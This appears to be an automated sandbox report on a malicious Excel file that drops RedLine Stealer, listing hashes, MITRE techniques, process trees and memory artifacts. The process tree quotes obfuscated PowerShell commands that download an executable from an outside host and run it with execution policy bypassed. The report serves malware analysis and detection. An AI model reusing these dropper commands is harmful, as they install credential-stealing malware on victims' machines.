redline | ce07dc9b67f4e91fb0254421599c3344f60732b99c24d39d4f2a5b8e93da56ef

Analysis

max time kernel
146s
max time network
129s
platform
windows10_x64
resource
win10v20201028
submitted
10-02-2021 07:49

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

order_list_fe99087.xls
Size

221KB
MD5

aeb9b7f6fb7bac0deac61db8295e1d3c
SHA1

823814c91d8c75933f0f49cda5b07ac14e484390
SHA256

ce07dc9b67f4e91fb0254421599c3344f60732b99c24d39d4f2a5b8e93da56ef
SHA512

cc3c349fdb18bbac96f36cff152c8c4873d10179cc6dab06863ac421ffc9b8d75f67c991522eaea736bc58aef3a7c172811e12f3ae08e4ebe6e32417456e936c

Score

10^/10

redline discovery infostealer ransomware spyware

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://urgfuid.gq/z/z.exe

Signatures

Process spawned unexpected child process 3 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

powershell.exepowershell.exepowershell.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	1864	1304	powershell.exe	EXCEL.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	2160	1304	powershell.exe	EXCEL.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	2624	1304	powershell.exe	EXCEL.EXE

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4512-40-0x0000000004110000-0x000000000413C000-memory.dmp	family_redline
behavioral2/memory/4512-46-0x0000000004380000-0x00000000043AA000-memory.dmp	family_redline

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

17 1864 powershell.exe
Executes dropped EXE 2 IoCs

Processes:

z.exeo.exe

pid process

4512 z.exe
4792 o.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
ransomware

System Information Discovery
T1082

flow	pid	process
17	1864	powershell.exe

pid	process
4512	z.exe
4792	o.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid process

1304 EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 31 IoCs

Processes:

powershell.exepowershell.exepowershell.exez.exeo.exe

pid	process
1864	powershell.exe
2160	powershell.exe
2624	powershell.exe
2160	powershell.exe
2624	powershell.exe
1864	powershell.exe
2160	powershell.exe
2624	powershell.exe
1864	powershell.exe
4512	z.exe
4512	z.exe
4792	o.exe
4792	o.exe
4792	o.exe
4792	o.exe
4792	o.exe
4792	o.exe
4792	o.exe
4792	o.exe
4792	o.exe
4792	o.exe
4792	o.exe
4792	o.exe
4792	o.exe
4792	o.exe
4792	o.exe
4792	o.exe
4792	o.exe
4792	o.exe
4792	o.exe
4792	o.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

powershell.exepowershell.exepowershell.exez.exeo.exe

description	pid	process
Token: SeDebugPrivilege	1864	powershell.exe
Token: SeDebugPrivilege	2624	powershell.exe
Token: SeDebugPrivilege	2160	powershell.exe
Token: SeDebugPrivilege	4512	z.exe
Token: SeDebugPrivilege	4792	o.exe

Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

EXCEL.EXE

pid process

1304 EXCEL.EXE
1304 EXCEL.EXE

Suspicious use of SetWindowsHookEx 15 IoCs

Processes:

EXCEL.EXEo.exe

pid	process
1304	EXCEL.EXE
1304	EXCEL.EXE
1304	EXCEL.EXE
1304	EXCEL.EXE
1304	EXCEL.EXE
1304	EXCEL.EXE
1304	EXCEL.EXE
1304	EXCEL.EXE
1304	EXCEL.EXE
1304	EXCEL.EXE
1304	EXCEL.EXE
1304	EXCEL.EXE
1304	EXCEL.EXE
1304	EXCEL.EXE
4792	o.exe

Suspicious use of WriteProcessMemory 11 IoCs

Processes:

EXCEL.EXEpowershell.exez.exe

description	pid	process	target process
PID 1304 wrote to memory of 1864	1304	EXCEL.EXE	powershell.exe
PID 1304 wrote to memory of 1864	1304	EXCEL.EXE	powershell.exe
PID 1304 wrote to memory of 2160	1304	EXCEL.EXE	powershell.exe
PID 1304 wrote to memory of 2160	1304	EXCEL.EXE	powershell.exe
PID 1304 wrote to memory of 2624	1304	EXCEL.EXE	powershell.exe
PID 1304 wrote to memory of 2624	1304	EXCEL.EXE	powershell.exe
PID 2624 wrote to memory of 4512	2624	powershell.exe	z.exe
PID 2624 wrote to memory of 4512	2624	powershell.exe	z.exe
PID 2624 wrote to memory of 4512	2624	powershell.exe	z.exe
PID 4512 wrote to memory of 4792	4512	z.exe	o.exe
PID 4512 wrote to memory of 4792	4512	z.exe	o.exe

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\order_list_fe99087.xls"
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1304

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -w 1 (nEw-oB`jecT Net.WebCL`I`eNT).('Down'+'loadFile').Invoke('http://urgfuid.gq/z/z.exe','z.exe')
2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1864

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -w 1 Start-Sleep 20; Move-Item "z.exe" -Destination "${enV`:appdata}"
2⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2160

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -w 1 -EP bypass Start-Sleep 25; cd ${enV`:appdata};.('.'+'/z.exe')
2⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2624

C:\Users\Admin\AppData\Roaming\z.exe
"C:\Users\Admin\AppData\Roaming\z.exe"
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4512

C:\Users\Admin\AppData\Local\Temp\o.exe
"C:\Users\Admin\AppData\Local\Temp\o.exe"
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4792

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5
d737fc27bbf2f3bd19d1706af83dbe3f

SHA1
212d219394124968b50769c371121a577d973985

SHA256
b96b55a2acd9c790092e8132b31e5f0110492f98828098112d46f2f9faa2b982

SHA512
974c2db081dd6d1f45763371c41e01173b189ea1a2d893d0bc415670bfa12f3934ba9dea64018b8c063017454d4d92888d6fe6eaad1659e420ba9adcde5e788b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
4535f96e055bf316b898dd294d34c7dc

SHA1
285a45622c61bb703e534ea029b49a78b64cd6bc

SHA256
d428372a6678f12b4d2283043af39d08285dfdc90943bef4a5e6f6e7111d2b7b

SHA512
9740c2028b0a9a454658a83115f1953758fde47e6057718c6f31041174d17e83e11316938d1b21a6f5e7f561708f62a68481c5b8f0f86d88071fb176cd2a5bac

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
8af6efbaab75973315f4fa4633a1f900

SHA1
ddaf8d6d0723883e4bbb1510e004ba4f5c6371c0

SHA256
f65bfb7acb6780c4d85e3220bb104f91b50fd722c213fd8f765ee81a3700212d

SHA512
52049b8a4881f64b0451d1351cd5709f6c3823260f493151e24e1704362fe5861ee7dc5afb1e3bcfd5dcda3493cf39e94e819e4e7291e9c0e6b6cf9a7f862f19

Download Submit
C:\Users\Admin\AppData\Local\Temp\o.exe

MD5
f254515cdf3cf10e1555046493c5bee8

SHA1
4eee393ad747349fda88bf5690dbb60aa450eced

SHA256
24be4bd66f7e47dee0a64925c1ceee243396c06d18c00fb16ce54204cb9b096e

SHA512
c6e06be4c7b9150e99d1708b6b45153de4d850490274ea6672177bcbbdde676aed3a2a038dd14936b54b68bcc46f7fdc382db82a26b5776e9ca81d6dc14362b1

Download Submit
C:\Users\Admin\AppData\Local\Temp\o.exe

MD5
f254515cdf3cf10e1555046493c5bee8

SHA1
4eee393ad747349fda88bf5690dbb60aa450eced

SHA256
24be4bd66f7e47dee0a64925c1ceee243396c06d18c00fb16ce54204cb9b096e

SHA512
c6e06be4c7b9150e99d1708b6b45153de4d850490274ea6672177bcbbdde676aed3a2a038dd14936b54b68bcc46f7fdc382db82a26b5776e9ca81d6dc14362b1

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5
44dbfb1a22a74b96675ad8e22dc43fde

SHA1
d649e0d57674999eef40fdb41a8c6b9e8f728695

SHA256
b99546ba0e4d0ee8842ff3cbce5c392b160cde9167917846dfa00d3a3107b33e

SHA512
61664123b2503bd681a1318c38cc144cffecea60d5ead6950eafa845e00ea3d4537bfc1857b9b100fd1cf2b66996b2847d11ddd9b4ee8491a80f6349d3a3e874

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5
938af8bfbd5bb9caec62a56722d34fe7

SHA1
2d49fcf914a8148f0e3b1327cfac72ee6a7e0fa3

SHA256
f6eb69350a275e782aa7a688d624e734824c1226ad58902c71ad86f958d0255d

SHA512
bf36a8a2599cb61f5a9e93106e2fe7a08733e36d6737bacce798d7755bac7a72bdcf200bbfd75677939c412736c8708d9a9df157f498663a793cc8a7a7891abc

Download Submit
C:\Users\Admin\AppData\Roaming\z.exe

MD5
feb57ff3d961685dc7a12fcb2ef8ba63

SHA1
9fbceb22b3468083f3aa583e4183f4c9e407bcd9

SHA256
97059b74b76a880fae49ca4bfa64953cb694e60195a387018440066e5c0cf853

SHA512
8d61eac914c1cfc296e898772505a3646ede92e20855da5e5d0271fc856143a486f3efde7172ae09b46a4cbdfd37d547afddb86f3e5946a460372986fa0759a8

Download Submit
C:\Users\Admin\Documents\z.exe

MD5
feb57ff3d961685dc7a12fcb2ef8ba63

SHA1
9fbceb22b3468083f3aa583e4183f4c9e407bcd9

SHA256
97059b74b76a880fae49ca4bfa64953cb694e60195a387018440066e5c0cf853

SHA512
8d61eac914c1cfc296e898772505a3646ede92e20855da5e5d0271fc856143a486f3efde7172ae09b46a4cbdfd37d547afddb86f3e5946a460372986fa0759a8

Download Submit
memory/1304-3-0x00007FF8B5E60000-0x00007FF8B5E70000-memory.dmp

Filesize
64KB

Download
memory/1304-6-0x00007FF8B5E60000-0x00007FF8B5E70000-memory.dmp

Filesize
64KB

Download
memory/1304-5-0x00007FF8DA0C0000-0x00007FF8DA6F7000-memory.dmp

Filesize
6.2MB

Download
memory/1304-4-0x00007FF8B5E60000-0x00007FF8B5E70000-memory.dmp

Filesize
64KB

Download
memory/1304-2-0x00007FF8B5E60000-0x00007FF8B5E70000-memory.dmp

Filesize
64KB

Download
memory/1864-18-0x000001CBD0200000-0x000001CBD0201000-memory.dmp

Filesize
4KB

Download
memory/1864-27-0x000001CBE86D6000-0x000001CBE86D8000-memory.dmp

Filesize
8KB

Download
memory/1864-7-0x0000000000000000-mapping.dmp

Download
memory/1864-11-0x00007FF8D07A0000-0x00007FF8D118C000-memory.dmp

Filesize
9.9MB

Download
memory/1864-16-0x000001CBE86D0000-0x000001CBE86D2000-memory.dmp

Filesize
8KB

Download
memory/1864-17-0x000001CBE86D3000-0x000001CBE86D5000-memory.dmp

Filesize
8KB

Download
memory/2160-12-0x00007FF8D07A0000-0x00007FF8D118C000-memory.dmp

Filesize
9.9MB

Download
memory/2160-24-0x000001F9E8BC0000-0x000001F9E8BC1000-memory.dmp

Filesize
4KB

Download
memory/2160-31-0x000001F9E88B6000-0x000001F9E88B8000-memory.dmp

Filesize
8KB

Download
memory/2160-15-0x000001F9E88B0000-0x000001F9E88B2000-memory.dmp

Filesize
8KB

Download
memory/2160-8-0x0000000000000000-mapping.dmp

Download
memory/2160-19-0x000001F9E88B3000-0x000001F9E88B5000-memory.dmp

Filesize
8KB

Download
memory/2624-38-0x000001FB5DA76000-0x000001FB5DA78000-memory.dmp

Filesize
8KB

Download
memory/2624-22-0x000001FB5DA73000-0x000001FB5DA75000-memory.dmp

Filesize
8KB

Download
memory/2624-9-0x0000000000000000-mapping.dmp

Download
memory/2624-20-0x000001FB5DA70000-0x000001FB5DA72000-memory.dmp

Filesize
8KB

Download
memory/2624-14-0x00007FF8D07A0000-0x00007FF8D118C000-memory.dmp

Filesize
9.9MB

Download
memory/4512-36-0x0000000004200000-0x0000000004201000-memory.dmp

Filesize
4KB

Download
memory/4512-52-0x0000000006B14000-0x0000000006B16000-memory.dmp

Filesize
8KB

Download
memory/4512-40-0x0000000004110000-0x000000000413C000-memory.dmp

Filesize
176KB

Download
memory/4512-41-0x00000000024B0000-0x00000000024E6000-memory.dmp

Filesize
216KB

Download
memory/4512-39-0x0000000006B10000-0x0000000006B11000-memory.dmp

Filesize
4KB

Download
memory/4512-43-0x0000000006B13000-0x0000000006B14000-memory.dmp

Filesize
4KB

Download
memory/4512-44-0x0000000006B20000-0x0000000006B21000-memory.dmp

Filesize
4KB

Download
memory/4512-42-0x0000000006B12000-0x0000000006B13000-memory.dmp

Filesize
4KB

Download
memory/4512-45-0x0000000000400000-0x0000000000439000-memory.dmp

Filesize
228KB

Download
memory/4512-46-0x0000000004380000-0x00000000043AA000-memory.dmp

Filesize
168KB

Download
memory/4512-47-0x00000000069A0000-0x00000000069A1000-memory.dmp

Filesize
4KB

Download
memory/4512-48-0x0000000004500000-0x0000000004501000-memory.dmp

Filesize
4KB

Download
memory/4512-49-0x0000000007020000-0x0000000007021000-memory.dmp

Filesize
4KB

Download
memory/4512-50-0x0000000006AE0000-0x0000000006AE1000-memory.dmp

Filesize
4KB

Download
memory/4512-51-0x0000000007630000-0x0000000007631000-memory.dmp

Filesize
4KB

Download
memory/4512-37-0x0000000073A70000-0x000000007415E000-memory.dmp

Filesize
6.9MB

Download
memory/4512-53-0x0000000007790000-0x0000000007791000-memory.dmp

Filesize
4KB

Download
memory/4512-54-0x0000000007910000-0x0000000007911000-memory.dmp

Filesize
4KB

Download
memory/4512-55-0x00000000084D0000-0x00000000084D1000-memory.dmp

Filesize
4KB

Download
memory/4512-56-0x00000000086C0000-0x00000000086C1000-memory.dmp

Filesize
4KB

Download
memory/4512-57-0x0000000008D00000-0x0000000008D01000-memory.dmp

Filesize
4KB

Download
memory/4512-58-0x0000000008DB0000-0x0000000008DB1000-memory.dmp

Filesize
4KB

Download
memory/4512-59-0x00000000091A0000-0x00000000091A1000-memory.dmp

Filesize
4KB

Download
memory/4512-60-0x000000000A1F0000-0x000000000A1F1000-memory.dmp

Filesize
4KB

Download
memory/4512-32-0x0000000000000000-mapping.dmp

Download
memory/4512-35-0x00000000040C0000-0x00000000040C1000-memory.dmp

Filesize
4KB

Download
memory/4792-61-0x0000000000000000-mapping.dmp

Download
memory/4792-64-0x00007FF8D07F0000-0x00007FF8D1190000-memory.dmp

Filesize
9.6MB

Download
memory/4792-65-0x00000000003E0000-0x00000000003E2000-memory.dmp

Filesize
8KB

Download